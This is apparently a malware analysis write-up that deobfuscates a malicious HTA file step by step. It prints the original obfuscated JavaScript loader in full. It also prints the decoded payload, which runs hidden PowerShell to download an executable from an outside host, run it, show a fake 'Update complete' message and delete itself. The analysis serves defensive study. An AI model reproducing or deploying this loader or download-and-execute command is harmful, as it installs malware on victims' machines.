hta Malware analysis

In this writeup, we will be looking at an hta malware file, and see some of the deobfuscation techniques we can use to make sense of the obfuscated code. In other words, let’s do some good old-fashioned static malware analysis.

<script>var wyyqbu=’tarjya d{x mmaomvveqTioh(j-c1b0e0r,j-v1t0c0r)d;przeismirzfeeTnof(o0n,j0l)a;j xav=angedwk jAecotbiovjeuXrObbxjheacgtt(s\’lWxsfcrrlitpatw.tSkhueplklb\’t)v;k yaj.lRmutnf(e”uPdolwvejreSnhveclslm n-lWmiknfdxoewvSitfyoldeq mHmicdzdfehnd a$ldp=v$ueunivq:wtbecmjpn+p\’t\s\m4yao2u9e2c4y8v0o8lfx6n6r9e8r5rdqeg3mal9bavdb1xew3ddh7j4s3bec0fdz.qeaxeet\’y;z(hNjewwv-a’;var nhm=’Obbnjsescute dSvyzsetsewmh.zNfeata.iWgeabzChleisefnetz)p.bDvoqwdniliovacdnFyixlnec(q\’j khqtptlpqsx:r/r/wayhvtoaeeaeoruebdjdkifts.toarvgg/y1t7t/b5j2d4m.zdsaxtq\’p,p$hdm)o;dSbtsadrptn-fPzrxokcrerslsm y$jdf;s[lSpyvsxtoenmu.fRdejfmlpeycptqiqotng.dAysfsbejmxbtluyk]r:e:qLjopafdeWniutshiPzavrstlilaqlbNbagmueh(k\’tSnymsctkefmx.uWwibnkdgorwqsk.fFkodrnmksz\’f’;var ohwrpi=’)v;k[vswylsctretmn.kwgiznndroewksl.afmowrgmesm.rmjexsvsxahguecbdoexy]a:q:bsrhjoowb(q\’nUpphdrazttes mcqozmqpclreataem.y\’h,g\’bIknkfzolrbmaactlipoenb\’c,t[jWuitnddmofwtsm.wFwodrxmwsp.vMeewswspahgweaBiowxcBtumthtvoonbse]i:u:hOvKa,a h[xSxylsutteamp.yWwimnndeoiwnsm.fFqogrrmysb.gMzefsosuangkevBoosxsIlcdomnf]d:c:dIanpfrofrxmeartdivoxnu)t;y”a,t0e,pfnaslzsi’;var uzite=’eg)s;avsavrn ybz=qnbeawg tAfcdtxiwvgetXuObbnjteccgtx(r\’uSqcrrciwpjtdipnfgr.nFeiilpeeSoyisjtsegmgOzbajbeacntu\’c)u;svuaori mpr f=v vduoacnuhmfevnxtj.klgotccamtaicomnb.dharwegfu;opa i=w nuznbeisvcwajpiee(ppe.bszuobhsstrru(t8t)g)v;xihfr d(bbf.eFjiclrejEdxaiesztksn(dpz)r)fby.fDmerlxehtkerFnifloeu(wpr)w;c v}g ecmapticnhu i(xeh)m w{z}r uceleolscel(w)t;z’;var vpropt=’ b’;var ujqffvih=wyyqbu+nhm+ohwrpi+uzite+vpropt; var gbakdvjuy=””; var kyhbqlqmmr=2; var a=0; while(a<ujqffvih.length){ gbakdvjuy +=ujqffvih.charAt(a);a +=kyhbqlqmmr; }; bztjfyeogy=”ev”.concat(“al”); window[bztjfyeogy](gbakdvjuy); </script>

Looks like we are working with some heavily obfuscated javascript code. To make the code prettier for us to analyze and make sense first let's copy it to a new file and save it as JS for some syntax highlighting and let’s try to beautify it a little bit.

Sort of beautified

Ok, that’s a little better. But still doesn’t make much sense. Looking at the code, we can see there are five string variables being declared in the beginning. And later on line 13, they are all concatenated. We can rename these variables to make it more clear.

In the next section, there is some more variable declaration and a while loop.

If we take a closer look at the logic we can guess that the variable “gbakdvjuy” which is being defined as an empty string is used to build a deobfuscated payload.

Variable “kyhbqlqmnr” seems to be the increment size, which in our case is two (2). And “a” seems to be the counter, initialized at 0.

Let’s go ahead and rename these variables as well.

The while loop is pretty simple. It goes through the concatenatedString that was built by combining the first 4 variables and appends every second character to our new variable payload.

We can run the code up to this point and print out the final value of the variable payload.

try { moveTo(-100,-100);resizeTo(0,0); a=new ActiveXObject('Wscript.Shell'); a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'s4a2924808f66985de3a9ad1e3d743e0d.exe';(New-Object System.Net.WebClient).DownloadFile(' https://ahtaeereddit.org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);",0,false);var b=new ActiveXObject('Scripting.FileSystemObject');var p = document.location.href;p = unescape(p.substr(8));if (b.FileExists(p))b.DeleteFile(p); } catch (e) {} close();

Since the original file was HTML Application (hta) file, mshta.exe would be used as a program proxy to execute this script.

We can see that our ‘malicious.hta’ file spawns PowerShell executable upon its execution.

The name of the malware file is “s4a2924808f66985de3a9ad1e3d743e0d.exe”. And the full web address where the malicious JavaScript in malware.hta tries to download a .dat file is “https://ahtaeereddit.org/17/524.dat”

Happy Hacking!